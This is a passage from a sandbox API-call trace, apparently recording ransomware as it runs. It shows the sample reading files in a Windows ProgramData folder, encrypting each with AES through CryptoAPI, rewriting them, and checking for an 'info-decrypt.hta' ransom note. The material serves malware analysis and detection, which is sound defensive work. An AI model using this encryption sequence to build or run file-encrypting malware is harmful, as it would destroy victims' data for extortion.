phKey=0x691f1fc*=0xb7f510) returned 1 [0161.750] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0161.751] CryptSetKeyParam (hKey=0xb7f510, dwParam=0x4, pbData=0x3775b44*=0x1, dwFlags=0x0) returned 1 [0161.751] CryptSetKeyParam (hKey=0xb7f510, dwParam=0x1, pbData=0x3775b10, dwFlags=0x0) returned 1 [0161.751] CryptEncrypt (in: hKey=0xb7f510, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3775b54*, pdwDataLen=0x691f268*=0xcab0, dwBufLen=0xcab0 | out: pbData=0x3775b54*, pdwDataLen=0x691f268*=0xcab0) returned 1 [0161.751] CryptEncrypt (in: hKey=0xb7f510, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3782628*, pdwDataLen=0x691f270*=0x0, dwBufLen=0x10 | out: pbData=0x3782628*, pdwDataLen=0x691f270*=0x10) returned 1 [0161.752] CryptDestroyKey (hKey=0xb7f590) returned 1 [0161.752] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0161.752] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0161.753] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico", nBufferLength=0x105, lpBuffer=0x691ece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico", lpFilePart=0x0) returned 0x5f [0161.753] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1d4) returned 1 [0161.753] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0161.754] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691e010) returned 1 [0161.754] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico", nBufferLength=0x105, lpBuffer=0x691ee00, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico", lpFilePart=0x0) returned 0x5e [0161.754] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta", lpFilePart=0x0) returned 0x62 [0161.754] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f268) returned 1 [0161.755] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f2e4 | out: lpFileInformation=0x691f2e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1937e180, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x1937e180, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x1937e180, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0161.755] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f264) returned 1 [0161.755] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico", lpFilePart=0x0) returned 0x5e [0161.755] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2b4) returned 1 [0161.755] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico"), fInfoLevelId=0x0, lpFileInformation=0x37835e0 | out: lpFileInformation=0x37835e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2d17f5a, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2d17f5a, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c1f3d69, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x10850)) returned 1 [0161.755] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2b0) returned 1 [0161.755] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico", nBufferLength=0x105, lpBuffer=0x691ecf4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico", lpFilePart=0x0) returned 0x5e [0161.755] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1e8) returned 1 [0161.755] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2f0 [0161.755] GetFileType (hFile=0x2f0) returned 0x1 [0161.755] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f1e4) returned 1 [0161.755] GetFileType (hFile=0x2f0) returned 0x1 [0161.755] GetFileSize (in: hFile=0x2f0, lpFileSizeHigh=0x691f2f0 | out: lpFileSizeHigh=0x691f2f0*=0x0) returned 0x10850 [0161.756] ReadFile (in: hFile=0x2f0, lpBuffer=0x3783858, nNumberOfBytesToRead=0x10850, lpNumberOfBytesRead=0x691f29c, lpOverlapped=0x0 | out: lpBuffer=0x3783858*, lpNumberOfBytesRead=0x691f29c*=0x10850, lpOverlapped=0x0) returned 1 [0161.758] CloseHandle (hObject=0x2f0) returned 1 [0161.758] CryptAcquireContextW (in: phProv=0x691f23c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f23c*=0xb1ee18) returned 1 [0161.759] CryptGenRandom (in: hProv=0xb1ee18, dwLen=0x10, pbBuffer=0x37943fc | out: pbBuffer=0x37943fc) returned 1 [0162.487] CryptImportKey (in: hProv=0xb1ee18, pbData=0x3889d18, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f20c | out: phKey=0x691f20c*=0xb7fc10) returned 1 [0162.487] CryptContextAddRef (hProv=0xb1ee18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0162.487] CryptContextAddRef (hProv=0xb1ee18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0162.487] CryptDuplicateKey (in: hKey=0xb7fc10, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f1fc | out: phKey=0x691f1fc*=0xb7ef90) returned 1 [0162.487] CryptContextAddRef (hProv=0xb1ee18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0162.487] CryptSetKeyParam (hKey=0xb7ef90, dwParam=0x4, pbData=0x3889df8*=0x1, dwFlags=0x0) returned 1 [0162.487] CryptSetKeyParam (hKey=0xb7ef90, dwParam=0x1, pbData=0x3889dc4, dwFlags=0x0) returned 1 [0162.488] CryptEncrypt (in: hKey=0xb7ef90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3889e08*, pdwDataLen=0x691f268*=0x10860, dwBufLen=0x10860 | out: pbData=0x3889e08*, pdwDataLen=0x691f268*=0x10860) returned 1 [0162.488] CryptEncrypt (in: hKey=0xb7ef90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x389a68c*, pdwDataLen=0x691f270*=0x0, dwBufLen=0x10 | out: pbData=0x389a68c*, pdwDataLen=0x691f270*=0x10) returned 1 [0162.490] CryptDestroyKey (hKey=0xb7fc10) returned 1 [0162.490] CryptReleaseContext (hProv=0xb1ee18, dwFlags=0x0) returned 1 [0162.490] CryptReleaseContext (hProv=0xb1ee18, dwFlags=0x0) returned 1 [0162.490] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico", nBufferLength=0x105, lpBuffer=0x691ece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico", lpFilePart=0x0) returned 0x5e [0162.490] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1d4) returned 1 [0162.490] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0162.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691e010) returned 1 [0162.492] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico", nBufferLength=0x105, lpBuffer=0x691ee00, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico", lpFilePart=0x0) returned 0x5a [0162.492] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta", lpFilePart=0x0) returned 0x62 [0162.492] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f268) returned 1 [0162.492] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f2e4 | out: lpFileInformation=0x691f2e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1937e180, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x1937e180, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x1937e180, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0162.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f264) returned 1 [0162.492] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico", lpFilePart=0x0) returned 0x5a [0162.492] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2b4) returned 1 [0162.492] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico"), fInfoLevelId=0x0, lpFileInformation=0x389b634 | out: lpFileInformation=0x389b634*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2d3e0b7, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2d3e0b7, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c219ec7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xc04b)) returned 1 [0162.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2b0) returned 1 [0162.492] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico", nBufferLength=0x105, lpBuffer=0x691ecf4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico", lpFilePart=0x0) returned 0x5a [0162.492] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1e8) returned 1 [0162.492] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2f0 [0162.493] GetFileType (hFile=0x2f0) returned 0x1 [0162.493] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f1e4) returned 1 [0162.493] GetFileType (hFile=0x2f0) returned 0x1 [0162.493] GetFileSize (in: hFile=0x2f0, lpFileSizeHigh=0x691f2f0 | out: lpFileSizeHigh=0x691f2f0*=0x0) returned 0xc04b [0162.493] ReadFile (in: hFile=0x2f0, lpBuffer=0x389b88c, nNumberOfBytesToRead=0xc04b, lpNumberOfBytesRead=0x691f29c, lpOverlapped=0x0 | out: lpBuffer=0x389b88c*, lpNumberOfBytesRead=0x691f29c*=0xc04b, lpOverlapped=0x0) returned 1 [0162.545] CloseHandle (hObject=0x2f0) returned 1 [0162.545] CryptAcquireContextW (in: phProv=0x691f23c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f23c*=0xb1ea60) returned 1 [0162.546] CryptGenRandom (in: hProv=0xb1ea60, dwLen=0x10, pbBuffer=0x38a7c2c | out: pbBuffer=0x38a7c2c) returned 1 [0163.190] CryptImportKey (in: hProv=0xb1ea60, pbData=0x3a7b2e8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f20c | out: phKey=0x691f20c*=0xb7f6d0) returned 1 [0163.190] CryptContextAddRef (hProv=0xb1ea60, pdwReserved=0x0, dwFlags=0x0) returned 1 [0163.190] CryptContextAddRef (hProv=0xb1ea60, pdwReserved=0x0, dwFlags=0x0) returned 1 [0163.190] CryptDuplicateKey (in: hKey=0xb7f6d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f1fc | out: phKey=0x691f1fc*=0xb7f650) returned 1 [0163.190] CryptContextAddRef (hProv=0xb1ea60, pdwReserved=0x0, dwFlags=0x0) returned 1 [0163.190] CryptSetKeyParam (hKey=0xb7f650, dwParam=0x4, pbData=0x3a7b3c8*=0x1, dwFlags=0x0) returned 1 [0163.190] CryptSetKeyParam (hKey=0xb7f650, dwParam=0x1, pbData=0x3a7b394, dwFlags=0x0) returned 1 [0163.190] CryptEncrypt (in: hKey=0xb7f650, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a7b3d8*, pdwDataLen=0x691f268*=0xc050, dwBufLen=0xc050 | out: pbData=0x3a7b3d8*, pdwDataLen=0x691f268*=0xc050) returned 1 [0163.191] CryptEncrypt (in: hKey=0xb7f650, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3a8744c*, pdwDataLen=0x691f270*=0x0, dwBufLen=0x10 | out: pbData=0x3a8744c*, pdwDataLen=0x691f270*=0x10) returned 1 [0163.192] CryptDestroyKey (hKey=0xb7f6d0) returned 1 [0163.192] CryptReleaseContext (hProv=0xb1ea60, dwFlags=0x0) returned 1 [0163.192] CryptReleaseContext (hProv=0xb1ea60, dwFlags=0x0) returned 1 [0163.192] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico", nBufferLength=0x105, lpBuffer=0x691ece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico", lpFilePart=0x0) returned 0x5a [0163.192] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1d4) returned 1 [0163.192] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0163.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691e010) returned 1 [0163.540] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml", nBufferLength=0x105, lpBuffer=0x691ee00, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml", lpFilePart=0x0) returned 0x5b [0163.540] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta", lpFilePart=0x0) returned 0x62 [0163.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f268) returned 1 [0163.540] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f2e4 | out: lpFileInformation=0x691f2e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1937e180, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x1937e180, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x1937e180, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0163.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f264) returned 1 [0163.540] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml", lpFilePart=0x0) returned 0x5b [0163.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2b4) returned 1 [0163.541] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), fInfoLevelId=0x0, lpFileInformation=0x36b9bd4 | out: lpFileInformation=0x36b9bd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c219ec7, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x7c219ec7, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x7c219ec7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x3473)) returned 1 [0163.659] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2b0) returned 1 [0163.659] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml", nBufferLength=0x105, lpBuffer=0x691ecf4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml", lpFilePart=0x0) returned 0x5b [0163.659] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1e8) returned 1 [0163.659] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x428 [0163.660] GetFileType (hFile=0x428) returned 0x1 [0163.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f1e4) returned 1 [0163.660] GetFileType (hFile=0x428) returned 0x1 [0163.660] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x691f2f0 | out: lpFileSizeHigh=0x691f2f0*=0x0) returned 0x3473 [0163.660] ReadFile (in: hFile=0x428, lpBuffer=0x36cba4c, nNumberOfBytesToRead=0x3473, lpNumberOfBytesRead=0x691f29c, lpOverlapped=0x0 | out: lpBuffer=0x36cba4c*, lpNumberOfBytesRead=0x691f29c*=0x3473, lpOverlapped=0x0) returned 1 [0163.662] CloseHandle (hObject=0x428) returned 1 [0163.662] CryptAcquireContextW (in: phProv=0x691f23c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f23c*=0xb1eb70) returned 1 [0163.664] CryptGenRandom (in: hProv=0xb1eb70, dwLen=0x10, pbBuffer=0x36cf584 | out: pbBuffer=0x36cf584) returned 1 [0164.299] CryptImportKey (in: hProv=0xb1eb70, pbData=0x39048d8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f20c | out: phKey=0x691f20c*=0xb7f110) returned 1 [0164.299] CryptContextAddRef (hProv=0xb1eb70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0164.299] CryptContextAddRef (hProv=0xb1eb70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0164.300] CryptDuplicateKey (in: hKey=0xb7f110, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f1fc | out: phKey=0x691f1fc*=0xb7f390) returned 1 [0164.300] CryptContextAddRef (hProv=0xb1eb70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0164.300] CryptSetKeyParam (hKey=0xb7f390, dwParam=0x4, pbData=0x39049b8*=0x1, dwFlags=0x0) returned 1 [0164.300] CryptSetKeyParam (hKey=0xb7f390, dwParam=0x1, pbData=0x3904984, dwFlags=0x0) returned 1 [0164.300] CryptEncrypt (in: hKey=0xb7f390, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x39049c8*, pdwDataLen=0x691f268*=0x3480, dwBufLen=0x3480 | out: pbData=0x39049c8*, pdwDataLen=0x691f268*=0x3480) returned 1 [0164.300] CryptEncrypt (in: hKey=0xb7f390, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3907e6c*, pdwDataLen=0x691f270*=0x0, dwBufLen=0x10 | out: pbData=0x3907e6c*, pdwDataLen=0x691f270*=0x10) returned 1 [0164.302] CryptDestroyKey (hKey=0xb7f110) returned 1 [0164.302] CryptReleaseContext (hProv=0xb1eb70, dwFlags=0x0) returned 1 [0164.302] CryptReleaseContext (hProv=0xb1eb70, dwFlags=0x0) returned 1 [0164.302] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml", nBufferLength=0x105, lpBuffer=0x691ece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml", lpFilePart=0x0) returned 0x5b [0164.302] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1d4) returned 1 [0164.302] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0164.304] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691e010) returned 1 [0164.304] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico", nBufferLength=0x105, lpBuffer=0x691ee00, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico", lpFilePart=0x0) returned 0x59 [0164.305] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta", lpFilePart=0x0) returned 0x62 [0164.305] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f268) returned 1 [0164.305] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f2e4 | out: lpFileInformation=0x691f2e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1937e180, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x1937e180, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x1937e180, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0164.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f264) returned 1 [0164.305] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device 